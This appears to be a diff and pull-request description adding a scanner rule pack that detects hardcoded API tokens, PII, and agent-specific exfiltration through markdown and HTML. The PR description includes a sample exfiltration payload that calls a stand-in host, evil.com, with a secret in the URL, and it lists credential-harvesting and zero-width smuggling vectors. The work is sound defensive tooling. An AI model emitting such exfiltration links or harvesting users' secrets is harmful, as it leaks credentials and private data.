+      Remove the hardcoded Slack token. Use environment variables and rotate
+      the token in your Slack app configuration.
+
+  - id: PG_SECRET_SLACK_WEBHOOK
+    category: hardcoded_secrets
+    severity: HIGH
+    patterns:
+      - "https://hooks\\.slack\\.com/services/T[A-Z0-9]{8,}/B[A-Z0-9]{8,}/[A-Za-z0-9]{24}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Slack incoming webhook URL detected. Webhook URLs can be used to post
+      messages to Slack channels and should not be hardcoded.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Store webhook URLs in environment variables or a secrets manager.
+
+  - id: PG_SECRET_HUGGINGFACE_TOKEN
+    category: hardcoded_secrets
+    severity: HIGH
+    patterns:
+      - "hf_[A-Za-z0-9]{34}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Hugging Face access token detected. HF tokens grant access to models,
+      datasets, and Spaces. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded token. Use the HF_TOKEN environment variable or
+      huggingface-cli login. Rotate at https://huggingface.co/settings/tokens
+
+  - id: PG_SECRET_TWILIO_KEY
+    category: hardcoded_secrets
+    severity: HIGH
+    patterns:
+      - "SK[a-f0-9]{32}"
+      - "(?i)twilio.{0,20}['\"][a-f0-9]{32}['\"]"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+      - "(?i)SKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Twilio API key or auth token detected. Twilio credentials can be used
+      to send SMS, make calls, and incur charges. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded Twilio key. Use TWILIO_AUTH_TOKEN environment variable.
+      Rotate the key in your Twilio console.
+
+  - id: PG_SECRET_SENDGRID_KEY
+    category: hardcoded_secrets
+    severity: HIGH
+    patterns:
+      - "SG\\.[A-Za-z0-9_-]{22}\\.[A-Za-z0-9_-]{43}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      SendGrid API key detected. SendGrid keys can be used to send emails at
+      scale and are commonly abused for phishing. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded SendGrid key. Use the SENDGRID_API_KEY environment
+      variable. Rotate the key at https://app.sendgrid.com/settings/api_keys
+
+  - id: PG_SECRET_NPM_TOKEN
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      - "npm_[A-Za-z0-9]{36}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      npm access token detected. npm tokens can publish packages and modify
+      registry settings, enabling supply chain attacks. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded npm token. Use npm login or NPM_TOKEN environment
+      variable. Rotate the token at https://www.npmjs.com/settings/tokens
+
+  - id: PG_SECRET_PYPI_TOKEN
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      - "pypi-[A-Za-z0-9_-]{100,}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      PyPI API token detected. PyPI tokens can publish Python packages,
+      enabling supply chain attacks on the Python ecosystem. Not covered by
+      Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded PyPI token. Use trusted publishing or environment
+      variables. Rotate at https://pypi.org/manage/account/token/
+
+  - id: PG_SECRET_DISCORD_TOKEN
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      # Discord bot tokens — base64-encoded user ID + timestamp + HMAC
+      - "[MN][A-Za-z0-9]{23,}\\.[A-Za-z0-9_-]{6}\\.[A-Za-z0-9_-]{27,}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+      - "(?i)eyJ"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Discord bot token detected. Discord tokens grant full control over a bot
+      account and can be used to read messages, manage servers, and exfiltrate
+      data. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded Discord token. Use the DISCORD_TOKEN environment
+      variable. Regenerate the token in the Discord Developer Portal.
+
+  - id: PG_SECRET_AZURE_KEY
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      # Azure Cognitive Services / OpenAI key — 32-char hex
+      - "(?i)(?:azure|cognitive|openai)[_-]?(?:api)?[_-]?key['\"]?\\s*[:=]\\s*['\"]([a-f0-9]{32})['\"]"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+      - "(?i)your.?key"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Azure Cognitive Services or Azure OpenAI key detected. These keys grant
+      access to AI models and can incur significant costs. Not covered by
+      Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded Azure key. Use Azure Key Vault or environment
+      variables. Rotate the key in the Azure Portal.
+
+  - id: PG_SECRET_DIGITALOCEAN_TOKEN
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      - "dop_v1_[a-f0-9]{64}"
+      - "doo_v1_[a-f0-9]{64}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      DigitalOcean personal access or OAuth token detected. These tokens
+      grant full API access to cloud infrastructure. Not covered by Cisco's
+      core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded DigitalOcean token. Use environment variables.
+      Rotate the token at https://cloud.digitalocean.com/account/api/tokens


### PR DESCRIPTION
## Summary

Adds a self-contained community rule pack (`data/packs/promptguard/`) with **26 detection rules** covering three categories that have zero or minimal coverage in the core pack and ATR pack today.

**Zero existing files modified. Data-only contribution.**

### Gap analysis

| Category | Core pack | ATR pack | This pack |
|----------|-----------|----------|-----------|
| PII detection | 0 rules | 0 rules | **8 rules** |
| Secret providers | 8 providers | 0 | **12 providers** |
| LLM-context exfiltration | Python/JS network calls | 1 (disguised analytics) | **6 rules** |

### 1. PII Detection (`pii_detection.yaml` — 8 rules)

Neither the core pack nor ATR detect PII in skill packages. These rules catch embedded SSNs, credit cards, IBANs, medical IDs, and skill instructions that harvest PII/credentials from users.

| Rule ID | Severity | What it detects |
|---------|----------|-----------------|
| `PG_PII_SSN` | CRITICAL | US Social Security Numbers |
| `PG_PII_CREDIT_CARD` | CRITICAL | Visa, Mastercard, Amex, Discover |
| `PG_PII_IBAN` | HIGH | International Bank Account Numbers |
| `PG_PII_PHONE_HARVESTING` | HIGH | Instructions to collect phone numbers |
| `PG_PII_SSN_HARVESTING` | CRITICAL | Instructions to collect SSNs/national IDs |
| `PG_PII_CARD_HARVESTING` | CRITICAL | Instructions to collect credit card details |
| `PG_PII_CREDENTIAL_HARVESTING` | CRITICAL | Instructions to collect passwords |
| `PG_PII_MEDICAL_ID` | HIGH | Medicare Beneficiary Identifiers (HIPAA PHI) |

### 2. Extended Secret Providers (`secret_providers.yaml` — 12 rules)

Complements the 8 providers in `core/signatures/hardcoded_secrets.yaml` with providers common in AI/agent deployments.

| Rule ID | Severity | Provider |
|---------|----------|----------|
| `PG_SECRET_OPENAI_KEY` | CRITICAL | OpenAI (sk-proj-..., sk-svcacct-...) |
| `PG_SECRET_ANTHROPIC_KEY` | CRITICAL | Anthropic (sk-ant-...) |
| `PG_SECRET_SLACK_TOKEN` | CRITICAL | Slack (xoxb-/xoxp-/xapp-) |
| `PG_SECRET_SLACK_WEBHOOK` | HIGH | Slack incoming webhook URLs |
| `PG_SECRET_HUGGINGFACE_TOKEN` | HIGH | Hugging Face (hf_...) |
| `PG_SECRET_TWILIO_KEY` | HIGH | Twilio API key / auth token |
| `PG_SECRET_SENDGRID_KEY` | HIGH | SendGrid (SG....) |
| `PG_SECRET_NPM_TOKEN` | CRITICAL | npm (supply chain risk) |
| `PG_SECRET_PYPI_TOKEN` | CRITICAL | PyPI (supply chain risk) |
| `PG_SECRET_DISCORD_TOKEN` | CRITICAL | Discord bot token |
| `PG_SECRET_AZURE_KEY` | CRITICAL | Azure Cognitive Services / Azure OpenAI |
| `PG_SECRET_DIGITALOCEAN_TOKEN` | CRITICAL | DigitalOcean (dop_v1_...) |

### 3. LLM-Context Exfiltration (`markdown_exfiltration.yaml` — 6 rules)

Agent-specific exfiltration vectors that exploit markdown rendering and URL construction — invisible to network-level detection.

| Rule ID | Severity | What it detects |
|---------|----------|-----------------|
| `PG_EXFIL_MARKDOWN_IMAGE` | CRITICAL | `![](https://evil.com?d={{SECRET}})` image URL exfil |
| `PG_EXFIL_MARKDOWN_LINK` | HIGH | Markdown link smuggling data in URLs |
| `PG_EXFIL_HTML_TAG` | HIGH | HTML `<img>`/`<script>` injection with dynamic URLs |
| `PG_EXFIL_DATA_URI` | HIGH | `data:text/html;base64,...` executable smuggling |
| `PG_EXFIL_URL_ENCODING` | HIGH | Instructions to encode secrets into URL parameters |
| `PG_EXFIL_INVISIBLE_PAYLOAD` | CRITICAL | Zero-width character steganography |

## File structure

```
skill_scanner/data/packs/promptguard/
├── pack.yaml                              # Pack manifest
├── README.md                              # Documentation
└── signatures/
    ├── pii_detection.yaml                 # 8 PII rules
    ├── secret_providers.yaml              # 12 secret provider rules
    └── markdown_exfiltration.yaml         # 6 LLM exfil rules
```

## Verification

- All 26 rules load via `RuleLoader` and `resolve_rule_packs(['promptguard'])`
- Pack appears in `list_available_packs()` → `['atr', 'promptguard']`
- Unknown `pii_exposure` category falls back gracefully to `POLICY_VIOLATION` (same mechanism ATR uses for its custom categories)
- All 457 existing tests pass (1 pre-existing failure in `test_gpt5_provider_detection` unrelated to this PR)
- `check-taxonomy` hook passes
- All YAML files are valid
- Usage: `skill-scanner scan /path/to/skill --rule-packs promptguard`

## Source

All patterns are from the [PromptGuard](https://github.com/promptguard/promptguard) open-source project (Apache-2.0).